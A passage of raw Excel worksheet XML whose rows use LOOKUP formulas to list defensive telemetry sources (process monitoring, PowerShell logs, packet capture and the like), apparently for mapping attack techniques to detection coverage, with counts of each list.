      <c r="C3" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D3" s="13">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="18"/>
      <c r="G3" s="19"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A4" s="55" t="s">
        <v>544</v>
      </c>
      <c r="B4" s="13" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D4" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="18"/>
      <c r="G4" s="19"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A5" s="55" t="s">
        <v>547</v>
      </c>
      <c r="B5" s="13" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C5" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D5" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E5" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F5" s="18"/>
      <c r="G5" s="19"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A6" s="53" t="s">
        <v>48</v>
      </c>
      <c r="B6" s="13" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D6" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E6" s="13">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F6" s="18"/>
      <c r="G6" s="19"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A7" s="55" t="s">
        <v>557</v>
      </c>
      <c r="B7" s="13" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C7" s="17">
        <v>100</v>
      </c>
      <c r="D7" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E7" s="13">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F7" s="13"/>
      <c r="G7" s="19"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A8" s="53" t="s">
        <v>563</v>
      </c>
      <c r="B8" s="13" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D8" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E8" s="13">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F8" s="13"/>
      <c r="G8" s="19"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A9" s="53" t="s">
        <v>567</v>
      </c>
      <c r="B9" s="13" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>57</v>
      </c>
      <c r="D9" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E9" s="13">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>5</v>
      </c>
      <c r="F9" s="13"/>
      <c r="G9" s="19"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A10" s="53" t="s">
        <v>572</v>
      </c>
      <c r="B10" s="13" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>59</v>
      </c>
      <c r="D10" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E10" s="13">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F10" s="13"/>
      <c r="G10" s="19"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A11" s="53" t="s">
        <v>577</v>
      </c>
      <c r="B11" s="13" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D11" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F11" s="13"/>
      <c r="G11" s="19"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A12" s="55" t="s">
        <v>582</v>
      </c>
      <c r="B12" s="13" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C12" s="17">
        <v>100</v>
      </c>
      <c r="D12" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E12" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F12" s="13"/>
      <c r="G12" s="19"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A13" s="55" t="s">
        <v>587</v>
      </c>
      <c r="B13" s="13" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C13" s="17">
        <v>100</v>
      </c>
      <c r="D13" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E13" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F13" s="13"/>
      <c r="G13" s="19"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A14" s="55" t="s">
        <v>593</v>
      </c>
      <c r="B14" s="13" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C14" s="17">
        <v>0</v>
      </c>
      <c r="D14" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E14" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F14" s="13"/>
      <c r="G14" s="19"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A15" s="53" t="s">
        <v>51</v>
      </c>
      <c r="B15" s="13" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D15" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F15" s="13"/>
      <c r="G15" s="19"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A16" s="55" t="s">
        <v>53</v>
      </c>
      <c r="B16" s="13" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C16" s="17">
        <v>100</v>
      </c>
      <c r="D16" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E16" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F16" s="13"/>
      <c r="G16" s="19"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="53" t="s">
        <v>54</v>
      </c>
      <c r="B17" s="13" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D17" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F17" s="13"/>
      <c r="G17" s="19"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="53" t="s">
        <v>56</v>
      </c>
      <c r="B18" s="13" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D18" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E18" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F18" s="13"/>
      <c r="G18" s="19"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="53" t="s">
        <v>60</v>
      </c>
      <c r="B19" s="13" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D19" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E19" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F19" s="13"/>
      <c r="G19" s="19"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="53" t="s">
        <v>62</v>
      </c>
      <c r="B20" s="13" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D20" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E20" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F20" s="13"/>
      <c r="G20" s="19"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="53" t="s">
        <v>626</v>
      </c>
      <c r="B21" s="13" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,User interface</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D21" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E21" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F21" s="13"/>
      <c r="G21" s="19"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="55" t="s">
        <v>64</v>
      </c>
      <c r="B22" s="13" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C22" s="17">
        <v>100</v>
      </c>
      <c r="D22" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E22" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="13"/>
      <c r="G22" s="19"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="53" t="s">
        <v>68</v>
      </c>
      <c r="B23" s="13" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>82</v>
      </c>
      <c r="D23" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E23" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F23" s="13"/>
      <c r="G23" s="19"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="53" t="s">
        <v>72</v>
      </c>
      <c r="B24" s="13" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D24" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E24" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F24" s="13"/>
      <c r="G24" s="19"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="53" t="s">
        <v>75</v>
      </c>
      <c r="B25" s="13" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D25" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E25" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F25" s="13"/>
      <c r="G25" s="19"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="53" t="s">
        <v>79</v>
      </c>
      <c r="B26" s="13" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D26" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F26" s="13"/>
      <c r="G26" s="19"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="53" t="s">
        <v>651</v>
      </c>
      <c r="B27" s="13" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture,Network protocol analysis</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D27" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E27" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F27" s="13"/>
      <c r="G27" s="19"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="53" t="s">
        <v>80</v>
      </c>
      <c r="B28" s="13" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D28" s="13">
        <f t="shared" si="1"/>
        <v>13</v>
      </c>
      <c r="E28" s="13">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="F28" s="13"/>
      <c r="G28" s="19"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="53" t="s">
        <v>662</v>
      </c>
      <c r="B29" s="13" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,Authentication logs</v>
      </c>
      <c r="C29" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D29" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E29" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F29" s="13"/>
      <c r="G29" s="19"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="53" t="s">
        <v>667</v>
      </c>
      <c r="B30" s="13" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Authentication logs,Process use of network</v>
      </c>
      <c r="C30" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D30" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E30" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F30" s="13"/>
      <c r="G30" s="19"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="53" t="s">
        <v>672</v>
      </c>
      <c r="B31" s="13" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,Process monitoring,Packet capture,DLL monitoring,Authentication logs,API monitoring,PowerShell logs</v>
      </c>
      <c r="C31" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D31" s="13">
        <f t="shared" si="1"/>
        <v>8</v>
      </c>
      <c r="E31" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F31" s="13"/>
      <c r="G31" s="19"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="53" t="s">
        <v>677</v>
      </c>
      <c r="B32" s="13" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Process use of network,Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C32" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D32" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F32" s="13"/>
      <c r="G32" s="19"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="53" t="s">
        <v>683</v>
      </c>
      <c r="B33" s="13" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C33" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D33" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E33" s="13">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F33" s="13"/>
      <c r="G33" s="19"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="53" t="s">
        <v>688</v>
      </c>
      <c r="B34" s="13" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C34" s="17" t="s">
        <v>99</v>
      </c>
      <c r="D34" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E34" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F34" s="13"/>
      <c r="G34" s="19"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="53" t="s">
        <v>85</v>
      </c>
      <c r="B35" s="13" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C35" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D35" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E35" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F35" s="13"/>
      <c r="G35" s="19"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="53" t="s">
        <v>86</v>
      </c>
      <c r="B36" s="13" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C36" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D36" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E36" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F36" s="13"/>
      <c r="G36" s="19"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="53" t="s">
        <v>87</v>
      </c>
      <c r="B37" s="13" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
      <c r="C37" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D37" s="13">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E37" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F37" s="13"/>
      <c r="G37" s="19"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="53" t="s">
        <v>705</v>
      </c>
      <c r="B38" s="13" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Binary file metadata,File monitoring,Malware reverse engineering</v>
      </c>
      <c r="C38" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D38" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E38" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F38" s="13"/>
      <c r="G38" s="19"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="55" t="s">
        <v>711</v>
      </c>
      <c r="B39" s="13" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C39" s="17">
        <v>100</v>
      </c>
      <c r="D39" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E39" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F39" s="13"/>
      <c r="G39" s="19"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="55" t="s">
        <v>717</v>
      </c>
      <c r="B40" s="13" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C40" s="17">
        <v>100</v>
      </c>
      <c r="D40" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E40" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F40" s="13"/>
      <c r="G40" s="19"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="53" t="s">
        <v>720</v>
      </c>
      <c r="B41" s="13" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C41" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D41" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E41" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F41" s="13"/>
      <c r="G41" s="19"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="53" t="s">
        <v>726</v>
      </c>
      <c r="B42" s="13" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C42" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D42" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E42" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F42" s="13"/>
      <c r="G42" s="19"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="53" t="s">
        <v>91</v>
      </c>
      <c r="B43" s="13" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C43" s="17" t="s">
        <v>50</v>
      </c>
      <c r="D43" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E43" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F43" s="13"/>
      <c r="G43" s="19"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="53" t="s">
        <v>92</v>
      </c>
      <c r="B44" s="13" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D44" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F44" s="13"/>
      <c r="G44" s="19"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="53" t="s">
        <v>98</v>
      </c>
      <c r="B45" s="13" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C45" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D45" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E45" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F45" s="13"/>
      <c r="G45" s="19"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="55" t="s">
        <v>100</v>
      </c>
      <c r="B46" s="13" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C46" s="17">
        <v>100</v>
      </c>
      <c r="D46" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E46" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F46" s="13"/>
      <c r="G46" s="19"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="53" t="s">
        <v>102</v>
      </c>
      <c r="B47" s="13" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C47" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D47" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E47" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F47" s="13"/>
      <c r="G47" s="19"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="53" t="s">
        <v>752</v>
      </c>
      <c r="B48" s="13" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C48" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D48" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E48" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F48" s="13"/>
      <c r="G48" s="19"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="55" t="s">
        <v>757</v>
      </c>
      <c r="B49" s="13" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C49" s="17">
        <v>100</v>
      </c>
      <c r="D49" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E49" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F49" s="13"/>
      <c r="G49" s="19"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="53" t="s">
        <v>761</v>
      </c>
      <c r="B50" s="13" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C50" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D50" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E50" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F50" s="13"/>
      <c r="G50" s="19"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="53" t="s">
        <v>766</v>
      </c>
      <c r="B51" s="13" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C51" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D51" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E51" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F51" s="13"/>
      <c r="G51" s="19"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="53" t="s">
        <v>772</v>
      </c>
      <c r="B52" s="13" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C52" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D52" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E52" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F52" s="13"/>
      <c r="G52" s="19"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="53" t="s">
        <v>776</v>
      </c>
      <c r="B53" s="13" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
